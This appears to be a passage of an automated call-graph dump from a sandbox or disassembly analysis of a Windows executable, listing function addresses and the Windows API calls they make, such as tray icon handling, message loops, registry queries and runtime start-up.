7ff656cc1815 95018->95004 95022 7ff656cc1898 95022->95004 95029 7ff656cc1a30 45 API calls 95029->95036 95030 7ff656cc1799 95030->95018 95057 7ff656d334e4 77 API calls 3 library calls 95030->95057 95031 7ff656cd2130 45 API calls 95031->95036 95032 7ff656d0bfe4 95056 7ff656d493a4 77 API calls 95032->95056 95035 7ff656cc3c20 300 API calls 95035->95036 95036->95015 95036->95018 95036->95029 95036->95030 95036->95031 95036->95032 95036->95035 95037 7ff656cbe0a8 4 API calls 95036->95037 95040 7ff656cbef9c 46 API calls 95036->95040 95042 7ff656cd20d0 45 API calls 95036->95042 95043 7ff656cb5af8 300 API calls 95036->95043 95044 7ff656cd5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95036->95044 95045 7ff656cd35c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95036->95045 95046 7ff656cd4f0c 34 API calls _onexit 95036->95046 95047 7ff656cd50b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95036->95047 95048 7ff656cd36c4 77 API calls 95036->95048 95049 7ff656cd37dc 300 API calls 95036->95049 95054 7ff656cbee20 5 API calls Concurrency::wait 95036->95054 95055 7ff656d1ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95036->95055 95037->95036 95040->95036 95041->95022 95042->95036 95043->95036 95045->95036 95046->95036 95048->95036 95049->95036 95050->95018 95051->95013 95052->95007 95053->95036 95054->95036 95055->95036 95056->95030 95057->95030 95058 7ff656d0f890 95067 7ff656cbe18c 95058->95067 95060 7ff656d0f8a9 95063 7ff656d0f915 Concurrency::wait 95060->95063 95073 7ff656cd2ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95060->95073 95062 7ff656d0f8f6 95062->95063 95074 7ff656d31464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95062->95074 95065 7ff656d103e1 Concurrency::wait 95063->95065 95075 7ff656d334e4 77 API calls 3 library calls 95063->95075 95068 7ff656cbe1c2 95067->95068 95069 7ff656cbe1a7 95067->95069 95071 7ff656cbe1af 95068->95071 95077 7ff656cbee20 5 API calls Concurrency::wait 95068->95077 95076 7ff656cbee20 5 API calls Concurrency::wait 95069->95076 95071->95060 95073->95062 95075->95065 95076->95071 95077->95071 95078 7ff656d0b221 95079 7ff656d0b22a 95078->95079 95086 7ff656cc0378 95078->95086 95101 7ff656d247bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95079->95101 95081 7ff656d0b241 95102 7ff656d24708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95081->95102 95083 7ff656d0b264 95084 7ff656cc3c20 300 API calls 95083->95084 95085 7ff656d0b292 95084->95085 95092 7ff656cc0405 95085->95092 95103 7ff656d48d98 49 API calls Concurrency::wait 95085->95103 95095 7ff656cbf7b8 95086->95095 95089 7ff656d0b2d9 Concurrency::wait 95089->95086 95104 7ff656d247bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95089->95104 95093 7ff656cc070a 95092->95093 95094 7ff656cbe0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95092->95094 95105 7ff656cbee20 5 API calls Concurrency::wait 95092->95105 95094->95092 95097 7ff656cbf7d5 95095->95097 95096 7ff656cbf7de 95096->95092 95097->95096 95098 7ff656cb9640 4 API calls 95097->95098 95099 7ff656cbe0a8 4 API calls 95097->95099 95100 7ff656cbf7b8 4 API calls 95097->95100 95098->95097 95099->95097 95100->95097 95101->95081 95102->95083 95103->95089 95104->95089 95105->95092 95106 7ff656cd8fac 95107 7ff656cd8fd2 GetModuleHandleW 95106->95107 95108 7ff656cd901c 95106->95108 95107->95108 95116 7ff656cd8fdf 95107->95116 95123 7ff656ceb9bc EnterCriticalSection 95108->95123 95110 7ff656cd90cb 95111 7ff656ceba10 _isindst LeaveCriticalSection 95110->95111 95112 7ff656cd90f0 95111->95112 95114 7ff656cd90fc 95112->95114 95119 7ff656cd9118 11 API calls 95112->95119 95113 7ff656cd90a0 95117 7ff656cd90b8 95113->95117 95122 7ff656ceada4 75 API calls 95113->95122 95115 7ff656cd9026 95115->95110 95115->95113 95120 7ff656ceaa8c 31 API calls 95115->95120 95116->95108 95124 7ff656cd9164 GetModuleHandleExW 95116->95124 95118 7ff656ceada4 75 API calls 95117->95118 95118->95110 95119->95114 95120->95113 95122->95117 95125 7ff656cd91b5 95124->95125 95126 7ff656cd918e GetProcAddress 95124->95126 95127 7ff656cd91c5 95125->95127 95128 7ff656cd91bf FreeLibrary 95125->95128 95126->95125 95129 7ff656cd91a8 95126->95129 95127->95108 95128->95127 95129->95125 95130 7ff656cb5dec 95131 7ff656cb5df4 95130->95131 95132 7ff656cb5e98 95131->95132 95133 7ff656cb5e28 95131->95133 95155 7ff656cb5e96 95131->95155 95134 7ff656cb5e9e 95132->95134 95135 7ff656cfc229 95132->95135 95136 7ff656cb5f21 PostQuitMessage 95133->95136 95137 7ff656cb5e35 95133->95137 95139 7ff656cb5ea5 95134->95139 95140 7ff656cb5ecc SetTimer RegisterWindowMessageW 95134->95140 95186 7ff656ccede4 8 API calls 95135->95186 95144 7ff656cb5e7c 95136->95144 95141 7ff656cb5e40 95137->95141 95142 7ff656cfc2af 95137->95142 95138 7ff656cb5e6b DefWindowProcW 95138->95144 95145 7ff656cb5eae KillTimer 95139->95145 95146 7ff656cfc1b8 95139->95146 95140->95144 95147 7ff656cb5efc CreatePopupMenu 95140->95147 95148 7ff656cb5e49 95141->95148 95149 7ff656cb5f2b 95141->95149 95198 7ff656d2a40c 16 API calls fread_s 95142->95198 95172 7ff656cb5d88 95145->95172 95152 7ff656cfc1bd 95146->95152 95153 7ff656cfc1f7 MoveWindow 95146->95153 95147->95144 95148->95155 95162 7ff656cb5e5f 95148->95162 95163 7ff656cb5f0b 95148->95163 95176 7ff656cd4610 95149->95176 95151 7ff656cfc255 95187 7ff656cd2c44 47 API calls Concurrency::wait 95151->95187 95159 7ff656cfc1e4 SetFocus 95152->95159 95160 7ff656cfc1c2 95152->95160 95153->95144 95155->95138 95156 7ff656cfc2c3 95156->95138 95156->95144 95159->95144 95160->95162 95164 7ff656cfc1cb 95160->95164 95162->95138 95169 7ff656cb5d88 Shell_NotifyIconW 95162->95169 95184 7ff656cb5f3c 26 API calls fread_s 95163->95184 95185 7ff656ccede4 8 API calls 95164->95185 95168 7ff656cb5f1f 95168->95144 95170 7ff656cfc280 95169->95170 95188 7ff656cb6258 95170->95188 95173 7ff656cb5de4 95172->95173 95174 7ff656cb5d99 fread_s 95172->95174 95183 7ff656cb7098 DeleteObject DestroyWindow Concurrency::wait 95173->95183 95175 7ff656cb5db8 Shell_NotifyIconW 95174->95175 95175->95173 95177 7ff656cd461a fread_s 95176->95177 95178 7ff656cd46db 95176->95178 95199 7ff656cb72c8 95177->95199 95178->95144 95180 7ff656cd4660 95181 7ff656cd46a2 KillTimer SetTimer 95180->95181 95182 7ff656d1aaa1 Shell_NotifyIconW 95180->95182 95181->95178 95182->95181 95183->95144 95184->95168 95185->95144 95186->95151 95187->95162 95189 7ff656cb6287 fread_s 95188->95189 95243 7ff656cb61c4 95189->95243 95192 7ff656cb632d 95194 7ff656cfc644 Shell_NotifyIconW 95192->95194 95195 7ff656cb634e Shell_NotifyIconW 95192->95195 95196 7ff656cb72c8 6 API calls 95195->95196 95197 7ff656cb6365 95196->95197 95197->95155 95198->95156 95200 7ff656cb72f4 95199->95200 95219 7ff656cb73bc Concurrency::wait 95199->95219 95201 7ff656cb98e8 4 API calls 95200->95201 95202 7ff656cb7303 95201->95202 95203 7ff656cb7310 95202->95203 95204 7ff656cfcdfc LoadStringW 95202->95204 95221 7ff656cb7cf4 95203->95221 95206 7ff656cfce1e 95204->95206 95208 7ff656cbe0a8 4 API calls 95206->95208 95207 7ff656cb7324 95209 7ff656cfce30 95207->95209 95210 7ff656cb7336 95207->95210 95215 7ff656cb734f wcscpy fread_s 95208->95215 95232 7ff656cb7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95209->95232 95210->95206 95211 7ff656cb7343 95210->95211 95231 7ff656cb7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95211->95231 95214 7ff656cfce3c 95214->95215 95216 7ff656cb71f8 4 API calls 95214->95216 95218 7ff656cb73a3 Shell_NotifyIconW 95215->95218 95217 7ff656cfce63 95216->95217 95220 7ff656cb71f8 4 API calls 95217->95220 95218->95219 95219->95180 95220->95215 95222 7ff656cfd2c8 95221->95222 95223 7ff656cb7d0d 95221->95223 95234 7ff656cbdda4 95222->95234 95225 7ff656cb7d24 95223->95225 95228 7ff656cb7d51 95223->95228 95233 7ff656cb7e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95225->95233 95226 7ff656cfd2d3 95228->95226 95230 7ff656cd4c68 4 API calls 95228->95230 95229 7ff656cb7d2f memcpy_s 95229->95207 95230->95229 95231->95215 95232->95214 95233->95229 95235 7ff656cbddc7 memcpy_s 95234->95235 95236 7ff656cbdda9 95234->95236 95235->95226 95236->95235 95238 7ff656cba7c0 95236->95238 95239 7ff656cba7dd memcpy_s 95238->95239 95240 7ff656cba7ed 95238->95240 95239->95235 95241 7ff656cfe7da 95240->95241 95242 7ff656cd4c68 4 API calls 95240->95242 95242->95239 95244 7ff656cb61e0 95243->95244 95245 7ff656cfc5f8 95243->95245 95244->95192 95247 7ff656d2ad94 39 API calls wcsftime 95244->95247 95245->95244 95246 7ff656cfc602 DestroyIcon 95245->95246 95246->95244 95247->95192 95248 7ff656d0e263 95249 7ff656d0e271 95248->95249 95267 7ff656cc2680 95248->95267 95249->95249 95250 7ff656cc2856 95251 7ff656cc29c8 PeekMessageW 95251->95267 95252 7ff656cc26da GetInputState 95252->95251 95252->95267 95254 7ff656d0d181 TranslateAcceleratorW 95254->95267 95255 7ff656cc2a1f TranslateMessage DispatchMessageW 95256 7ff656cc2a33 PeekMessageW 95255->95256 95256->95267 95257 7ff656cc28b9 timeGetTime 95257->95267 95258 7ff656d0d2bb timeGetTime 95281 7ff656cd2ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95258->95281 95263 7ff656cc66c0 300 API calls 95263->95267 95264 7ff656cc3c20 300 API calls 95264->95267 95265 7ff656d334e4 77 API calls 95265->95267 95267->95250 95267->95251 95267->95252 95267->95254 95267->95255 95267->95256 95267->95257 95267->95258 95267->95263 95267->95264 95267->95265 95268 7ff656cc2b70 95267->95268 95275 7ff656cd2de8 95267->95275 95280 7ff656cc2e30 300 API calls 2 library calls 95267->95280 95282 7ff656d33a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95267->95282 95283 7ff656d4a320 300 API calls Concurrency::wait 95267->95283 95269 7ff656cc2b96 95268->95269 95271 7ff656cc2ba9 95268->95271 95284 7ff656cc2050 95269->95284 95304 7ff656d334e4 77 API calls 3 library calls 95271->95304 95272 7ff656cc2b9e 95272->95267 95274 7ff656d0e55c 95276 7ff656cd2e0d 95275->95276 95277 7ff656cd2e2a 95275->95277 95276->95267 95277->95276 95278 7ff656cd2e5b IsDialogMessageW 95277->95278 95279 7ff656d19d94 GetClassLongPtrW 95277->95279 95278->95276 95278->95277 95279->95277 95279->95278 95280->95267 95281->95267 95282->95267 95283->95267 95285 7ff656cc3c20 300 API calls 95284->95285 95289 7ff656cc20a8 95285->95289 95286 7ff656cc212d 95286->95272 95288 7ff656d0d08d 95289->95286 95290 7ff656cc2552 95289->95290 95297 7ff656cc2244 95289->95297 95298 7ff656d0d06f 95289->95298 95300 7ff656cc22a5 memcpy_s 95289->95300 95301 7ff656cc23cb memcpy_s 95289->95301 95292 7ff656cd4c68 4 API calls 95290->95292 95291 7ff656d0d036 95307 7ff656cbee20 5 API calls Concurrency::wait 95291->95307 95292->95301 95294 7ff656cd4c68 4 API calls 95294->95300 95295 7ff656d0d062 95308 7ff656cbee20 5 API calls Concurrency::wait 95295->95308 95297->95301 95305 7ff656cc1ce4 301 API calls Concurrency::wait 95297->95305 95309 7ff656d334e4 77 API calls 3 library calls 95298->95309 95300->95294 95300->95301 95301->95291 95303 7ff656d334e4 77 API calls 95301->95303 95306 7ff656cb4a60 300 API calls 95301->95306 95303->95301 95304->95274 95305->95300 95306->95301 95307->95295 95308->95298 95309->95288 95310 7ff656cd5328 95333 7ff656cd4cac 95310->95333 95313 7ff656cd5474 95363 7ff656cd57e4 7 API calls 2 library calls 95313->95363 95314 7ff656cd5344 95316 7ff656cd547e 95314->95316 95318 7ff656cd5362 95314->95318 95364 7ff656cd57e4 7 API calls 2 library calls 95316->95364 95319 7ff656cd5387 95318->95319 95320 7ff656cd53a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 95318->95320 95339 7ff656ceada4 95318->95339 95323 7ff656cd540d 95320->95323 95360 7ff656cd9204 35 API calls FindHandler 95320->95360 95321 7ff656cd5489 abort 95346 7ff656cd5930 95323->95346 95325 7ff656cd5412 95349 7ff656cb3730 95325->95349 95330 7ff656cd5435 95330->95321 95362 7ff656cd4e90 8 API calls 2 library calls 95330->95362 95332 7ff656cd544c 95332->95319 95334 7ff656cd4cce __scrt_initialize_crt 95333->95334 95365 7ff656cd65ec 95334->95365 95336 7ff656cd4cd7 95336->95313 95336->95314 95337 7ff656cd4cd3 __scrt_initialize_crt 95337->95336 95373 7ff656cd6620 8 API calls 3 library calls 95337->95373 95340 7ff656ceade0 95339->95340 95341 7ff656ceadff 95339->95341 95340->95341 95398 7ff656cb10e8 95340->95398 95403 7ff656cb1080 95340->95403 95408 7ff656cb1064 95340->95408 95413 7ff656cb1048 95340->95413 95341->95320 95611 7ff656cd6240 95346->95611 95350 7ff656cb3743 IsThemeActive 95349->95350 95351 7ff656cb37a3 95349->95351 95613 7ff656cd92d0 95350->95613 95361 7ff656cd5974 GetModuleHandleW 95351->95361 95357 7ff656cb377d 95625 7ff656cb37b0 95357->95625 95359 7ff656cb3785 SystemParametersInfoW 95359->95351 95360->95323 95361->95330 95362->95332 95363->95316 95364->95321 95366 7ff656cd65f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 95365->95366 95374 7ff656cd7290 95366->95374 95369 7ff656cd6603 95369->95337 95371 7ff656cd660c 95371->95369 95381 7ff656cd72d8 DeleteCriticalSection 95371->95381 95373->95336 95375 7ff656cd7298 95374->95375 95377 7ff656cd72c9 95375->95377 95378 7ff656cd65ff 95375->95378 95382 7ff656cd7614 95375->95382 95387 7ff656cd72d8 DeleteCriticalSection 95377->95387 95378->95369 95380 7ff656cd7218 8 API calls 3 library calls 95378->95380 95380->95371 95381->95369 95388 7ff656cd7310 95382->95388 95385 7ff656cd7654 95385->95375 95386 7ff656cd765f InitializeCriticalSectionAndSpinCount 95386->95385 95387->95378 95389 7ff656cd7371 95388->95389 95396 7ff656cd736c try_get_function 95388->95396 95389->95385 95389->95386 95390 7ff656cd73a0 LoadLibraryExW 95391 7ff656cd73c1 GetLastError 95390->95391 95390->95396 95391->95396 95392 7ff656cd7462 GetProcAddress 95393 7ff656cd7473 95392->95393 95393->95389 95394 7ff656cd7454 95394->95389 95394->95392 95395 7ff656cd7439 FreeLibrary 95395->95396 95396->95389 95396->95390 95396->95394 95396->95395 95397 7ff656cd73fb LoadLibraryExW 95396->95397 95397->95396 95418 7ff656cd1d80 95398->95418 95402 7ff656cd4f15 95402->95340 95443 7ff656cb7920 95403->95443 95405 7ff656cb109e 95473 7ff656cd4ebc 34 API calls _onexit 95405->95473 95407 7ff656cd4f15 95407->95340 95507 7ff656cb7ec0 95408->95507 95410 7ff656cb106d 95543 7ff656cd4ebc 34 API calls _onexit 95410->95543 95412 7ff656cd4f15 95412->95340 95592 7ff656cb7718 95413->95592 95417 7ff656cd4f15 95417->95340 95419 7ff656cb9640 4 API calls 95418->95419 95420 7ff656cd1db2 GetVersionExW 95419->95420 95421 7ff656cb7cf4 4 API calls 95420->95421 95423 7ff656cd1dfc 95421->95423 95422 7ff656cbdda4 4 API calls 95422->95423 95423->95422 95424 7ff656cd1e87 95423->95424 95425 7ff656cbdda4 4 API calls 95424->95425 95430 7ff656cd1ea4 95425->95430 95426 7ff656d19645 95427 7ff656d1964f 95426->95427 95441 7ff656d232f4 LoadLibraryA GetProcAddress 95427->95441 95428 7ff656cd1f3c GetCurrentProcess IsWow64Process 95429 7ff656cd1f7e fread_s 95428->95429 95429->95427 95432 7ff656cd1f86 GetSystemInfo 95429->95432 95430->95426 95430->95428 95434 7ff656cb10f1 95432->95434 95433 7ff656d196b1 95435 7ff656d196d7 GetSystemInfo 95433->95435 95436 7ff656d196b5 95433->95436 95440 7ff656cd4ebc 34 API calls _onexit 95434->95440 95438 7ff656d196bf 95435->95438 95442 7ff656d232f4 LoadLibraryA GetProcAddress 95436->95442 95438->95434 95439 7ff656d196f0 FreeLibrary 95438->95439 95439->95434 95440->95402 95441->95433 95442->95438 95444 7ff656cb7948 wcsftime 95443->95444 95445 7ff656cb9640 4 API calls 95444->95445 95446 7ff656cb7a02 95445->95446 95474 7ff656cb5680 95446->95474 95448 7ff656cb7a0c 95481 7ff656cd3a38 95448->95481 95451 7ff656cb71f8 4 API calls 95452 7ff656cb7a2c 95451->95452 95487 7ff656cb4680 95452->95487 95454 7ff656cb7a3d 95455 7ff656cb9640 4 API calls 95454->95455 95456 7ff656cb7a47 95455->95456 95491 7ff656cba854 95456->95491 95459 7ff656cfd05c RegQueryValueExW 95460 7ff656cfd131 RegCloseKey 95459->95460 95461 7ff656cfd08f 95459->95461 95464 7ff656cb7a83 Concurrency::wait 95460->95464 95472 7ff656cfd147 wcscat Concurrency::wait 95460->95472 95462 7ff656cd4c68 4 API calls 95461->95462 95463 7ff656cfd0b2 95462->95463 95465 7ff656cfd0bf RegQueryValueExW 95463->95465 95464->95405 95466 7ff656cfd0f3 95465->95466 95469 7ff656cfd112 95465->95469 95467 7ff656cb7cf4 4 API calls 95466->95467 95467->95469 95468 7ff656cb9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95468->95472 95469->95460 95470 7ff656cbec00 4 API calls 95470->95472 95471 7ff656cb4680 4 API calls 95471->95472 95472->95464 95472->95468 95472->95470 95472->95471 95473->95407 95495 7ff656cf8f90 95474->95495 95477 7ff656cbec00 4 API calls 95478 7ff656cb56b4 95477->95478 95497 7ff656cb56d4 95478->95497 95480 7ff656cb56c1 Concurrency::wait 95480->95448 95482 7ff656cf8f90 wcsftime 95481->95482 95483 7ff656cd3a44 GetFullPathNameW 95482->95483 95484 7ff656cd3a74 95483->95484 95485 7ff656cb7cf4 4 API calls 95484->95485 95486 7ff656cb7a1b 95485->95486 95486->95451 95488 7ff656cb469f 95487->95488 95489 7ff656cb46c8 memcpy_s 95487->95489 95490 7ff656cd4c68 4 API calls 95488->95490 95489->95454 95490->95489 95492 7ff656cba87a 95491->95492 95494 7ff656cb7a51 RegOpenKeyExW 95491->95494 95493 7ff656cd4c68 4 API calls 95492->95493 95493->95494 95494->95459 95494->95464 95496 7ff656cb568c GetModuleFileNameW 95495->95496 95496->95477 95498 7ff656cf8f90 wcsftime 95497->95498 95499 7ff656cb56e9 GetFullPathNameW 95498->95499 95500 7ff656cb5712 95499->95500 95501 7ff656cfc03a 95499->95501 95503 7ff656cb7cf4 4 API calls 95500->95503 95502 7ff656cba854 4 API calls 95501->95502 95504 7ff656cb571c 95502->95504 95503->95504 95504->95504 95505 7ff656cbdda4 4 API calls 95504->95505 95506 7ff656cb5785 95505->95506 95506->95480 95544 7ff656cb82b4 95507->95544 95510 7ff656cb82b4 4 API calls 95511 7ff656cb7f3a 95510->95511 95512 7ff656cb9640 4 API calls 95511->95512 95513 7ff656cb7f46 95512->95513 95514 7ff656cb7cf4 4 API calls 95513->95514 95515 7ff656cb7f59 95514->95515 95551 7ff656cd2d5c 6 API calls 95515->95551 95517 7ff656cb7fa5 95518 7ff656cb9640 4 API calls 95517->95518 95519 7ff656cb7fb1 95518->95519 95520 7ff656cb9640 4 API calls 95519->95520 95521 7ff656cb7fbd 95520->95521 95522 7ff656cb9640 4 API calls 95521->95522 95523 7ff656cb7fc9 95522->95523 95524 7ff656cb9640 4 API calls 95523->95524 95525 7ff656cb800f 95524->95525 95526 7ff656cb9640 4 API calls 95525->95526 95527 7ff656cb80f7 95526->95527 95552 7ff656ccef88 95527->95552 95529 7ff656cb8103 95559 7ff656cceec8 95529->95559 95531 7ff656cb812f 95532 7ff656cb9640 4 API calls 95531->95532 95533 7ff656cb813b 95532->95533 95570 7ff656cc6d40 95533->95570 95537 7ff656cb81ac 95538 7ff656cb81be GetStdHandle 95537->95538 95539 7ff656cb8220 OleInitialize 95538->95539 95540 7ff656cfd350 95538->95540 95539->95410 95587 7ff656d2ffc8 CreateThread 95540->95587 95542 7ff656cfd367 CloseHandle 95543->95412 95545 7ff656cb9640 4 API calls 95544->95545 95546 7ff656cb82c6 95545->95546 95547 7ff656cb9640 4 API calls 95546->95547 95548 7ff656cb82cf 95547->95548 95549 7ff656cb9640 4 API calls 95548->95549 95550 7ff656cb7f2e 95549->95550 95550->95510 95551->95517 95553 7ff656cb9640 4 API calls 95552->95553 95554 7ff656ccefa3 95553->95554 95555 7ff656cb9640 4 API calls 95554->95555 95556 7ff656ccefac 95555->95556 95557 7ff656cb9640 4 API calls 95556->95557 95558 7ff656ccf02e 95557->95558 95558->95529 95560 7ff656cceede 95559->95560 95561 7ff656cb9640 4 API calls 95560->95561 95562 7ff656cceeea 95561->95562 95563 7ff656cb9640 4 API calls 95562->95563 95564 7ff656cceef6 95563->95564 95565 7ff656cb9640 4 API calls 95564->95565 95566 7ff656ccef02 95565->95566 95567 7ff656cb9640 4 API calls 95566->95567 95568 7ff656ccef0e 95567->95568 95569 7ff656ccef68 RegisterWindowMessageW 95568->95569 95569->95531 95571 7ff656cc6db9 95570->95571 95577 7ff656cc6d80 95570->95577 95588 7ff656cd5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95571->95588 95579 7ff656cb816b 95577->95579 95589 7ff656cd5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95577->95589 95580 7ff656cd39a8 95579->95580 95581 7ff656d1a502 95580->95581 95586 7ff656cd39cc 95580->95586 95590 7ff656cbee20 5 API calls Concurrency::wait 95581->95590 95583 7ff656d1a50e 95591 7ff656cbee20 5 API calls Concurrency::wait 95583->95591 95585 7ff656d1a52d 95586->95537 95587->95542 95590->95583 95591->95585 95593 7ff656cb9640 4 API calls 95592->95593 95594 7ff656cb778f 95593->95594 95600 7ff656cb6f24 95594->95600 95596 7ff656cb782c 95597 7ff656cb1051 95596->95597 95603 7ff656cb7410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95596->95603 95599 7ff656cd4ebc 34 API calls _onexit 95597->95599 95599->95417 95604 7ff656cb6f60 95600->95604 95603->95596 95605 7ff656cb6f52 95604->95605 95606 7ff656cb6f85 95604->95606 95605->95596 95606->95605 95607 7ff656cb6f93 RegOpenKeyExW 95606->95607 95607->95605 95608 7ff656cb6faf RegQueryValueExW 95607->95608 95609 7ff656cb6ff5 RegCloseKey 95608->95609 95610 7ff656cb6fdd 95608->95610 95609->95605 95610->95609 95612 7ff656cd5947 GetStartupInfoW 95611->95612 95612->95325 95671 7ff656ceb9bc EnterCriticalSection 95613->95671 95615 7ff656cd92e4 95616 7ff656ceba10 _isindst LeaveCriticalSection 95615->95616 95617 7ff656cb376e 95616->95617 95618 7ff656cd9334 95617->95618 95619 7ff656cd933d 95618->95619 95623 7ff656cb3778 95618->95623 95672 7ff656ce55d4 15 API calls _invalid_parameter_noinfo 95619->95672 95621 7ff656cd9342 95673 7ff656ceb164 31 API calls _invalid_parameter_noinfo 95621->95673 95624 7ff656cb36e8 SystemParametersInfoW SystemParametersInfoW 95623->95624 95624->95357 95626 7ff656cb37cd wcsftime 95625->95626 95627 7ff656cb9640 4 API calls 95626->95627 95628 7ff656cb37dd GetCurrentDirectoryW 95627->95628 95674 7ff656cb57a0 95628->95674 95630 7ff656cb3807 IsDebuggerPresent 95631 7ff656cfb872 MessageBoxA 95630->95631 95632 7ff656cb3815 95630->95632 95633 7ff656cfb894 95631->95633 95632->95633 95634 7ff656cb3839 95632->95634 95784 7ff656cbe278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95633->95784 95748 7ff656cb3f04 95634->95748 95638 7ff656cb3860 GetFullPathNameW 95639 7ff656cb7cf4 4 API calls 95638->95639 95641 7ff656cb38a6 95639->95641 95640 7ff656cb38bf 95643 7ff656cfb8dc SetCurrentDirectoryW 95640->95643 95644 7ff656cb38c7 95640->95644 95764 7ff656cb3f9c 95641->95764 95643->95644 95645 7ff656cb38d0 95644->95645 95785 7ff656d1d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 95644->95785 95780 7ff656cb3b84 7 API calls 95645->95780 95648 7ff656cfb8f8 95648->95645 95651 7ff656cfb90c 95648->95651 95653 7ff656cb5680 6 API calls 95651->95653 95652 7ff656cb38da 95655 7ff656cb6258 46 API calls 95652->95655 95658 7ff656cb38ef 95652->95658 95654 7ff656cfb916 95653->95654 95656 7ff656cbec00 4 API calls 95654->95656 95655->95658 95659 7ff656cfb927 95656->95659 95657 7ff656cb3913 95663 7ff656cb391f SetCurrentDirectoryW 95657->95663 95658->95657 95660 7ff656cb5d88 Shell_NotifyIconW 95658->95660 95661 7ff656cfb930 95659->95661 95662 7ff656cfb94d 95659->95662 95660->95657 95664 7ff656cb71f8 4 API calls 95661->95664 95667 7ff656cb71f8 4 API calls 95662->95667 95666 7ff656cb3934 Concurrency::wait 95663->95666 95665 7ff656cfb93c 95664->95665 95786 7ff656cb7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95665->95786 95666->95359 95669 7ff656cfb963 GetForegroundWindow ShellExecuteW 95667->95669 95670 7ff656cfb99f Concurrency::wait 95669->95670 95670->95657 95672->95621 95673->95623 95675 7ff656cb9640 4 API calls 95674->95675 95676 7ff656cb57d7 95675->95676 95787 7ff656cb9bbc 95676->95787 95678 7ff656cb57fe 95679 7ff656cb5680 6 API calls 95678->95679 95680 7ff656cb5812 95679->95680 95681 7ff656cbec00 4 API calls 95680->95681 95682 7ff656cb5823 95681->95682 95801 7ff656cb6460 95682->95801 95685 7ff656cb584e Concurrency::wait 95690 7ff656cbe0a8 4 API calls 95685->95690 95686 7ff656cfc05e 95874 7ff656d32948 95686->95874 95688 7ff656cfc074 95689 7ff656cfc081 95688->95689 95691 7ff656cb652c 63 API calls 95688->95691 95892 7ff656cb652c 95689->95892 95692 7ff656cb586a 95690->95692 95691->95689 95694 7ff656cbec00 4 API calls 95692->95694 95695 7ff656cb5888 95694->95695 95699 7ff656cfc099 95695->95699 95827 7ff656cbeff8 95695->95827 95697 7ff656cb58ad Concurrency::wait 95698 7ff656cbec00 4 API calls 95697->95698 95700 7ff656cb58d7 95698->95700 95702 7ff656cb5ab4 4 API calls 95699->95702 95700->95699 95701 7ff656cbeff8 46 API calls 95700->95701 95704 7ff656cb58fc Concurrency::wait 95701->95704 95703 7ff656cfc0e1 95702->95703 95705 7ff656cb5ab4 4 API calls 95703->95705 95706 7ff656cb9640 4 API calls 95704->95706 95707 7ff656cfc103 95705->95707 95708 7ff656cb591f 95706->95708 95710 7ff656cb5680 6 API calls 95707->95710 95840 7ff656cb5ab4 95708->95840 95712 7ff656cfc12b 95710->95712 95714 7ff656cb5ab4 4 API calls 95712->95714 95716 7ff656cfc139 95714->95716 95715 7ff656cb5941 95715->95699 95717 7ff656cb5949 95715->95717 95718 7ff656cbe0a8 4 API calls 95716->95718 95719 7ff656cd8e28 wcsftime 37 API calls 95717->95719 95720 7ff656cfc14a 95718->95720 95721 7ff656cb5958 95719->95721 95722 7ff656cb5ab4 4 API calls 95720->95722 95721->95703 95723 7ff656cb5960 95721->95723 95726 7ff656cfc15b 95722->95726 95724 7ff656cd8e28 wcsftime 37 API calls 95723->95724 95725 7ff656cb596f 95724->95725 95725->95707 95727 7ff656cb5977 95725->95727 95728 7ff656cbe0a8 4 API calls 95726->95728 95729 7ff656cd8e28 wcsftime 37 API calls 95727->95729 95730 7ff656cfc172 95728->95730 95731 7ff656cb5986 95729->95731 95732 7ff656cb5ab4 4 API calls 95730->95732 95733 7ff656cb59c6 95731->95733 95734 7ff656cb5ab4 4 API calls 95731->95734 95736 7ff656cfc183 95732->95736 95733->95726 95735 7ff656cb59d3 95733->95735 95737 7ff656cb59a8 95734->95737 95863 7ff656cbdf90 95735->95863 95738 7ff656cbe0a8 4 API calls 95737->95738 95739 7ff656cb59b5 95738->95739 95741 7ff656cb5ab4 4 API calls 95739->95741 95741->95733 95744 7ff656cbd670 5 API calls 95745 7ff656cb5a12 95744->95745 95745->95744 95746 7ff656cb5ab4 4 API calls 95745->95746 95747 7ff656cb5a60 Concurrency::wait 95745->95747 95746->95745 95747->95630 95749 7ff656cb3f29 wcsftime 95748->95749 95750 7ff656cfba2c fread_s 95749->95750 95751 7ff656cb3f4b 95749->95751 95753 7ff656cfba4d GetOpenFileNameW 95750->95753 95752 7ff656cb56d4 5 API calls 95751->95752 95754 7ff656cb3f56 95752->95754 95755 7ff656cfbab0 95753->95755 95756 7ff656cb3858 95753->95756 96236 7ff656cb3eb4 95754->96236 95759 7ff656cb7cf4 4 API calls 95755->95759 95756->95638 95756->95640 95761 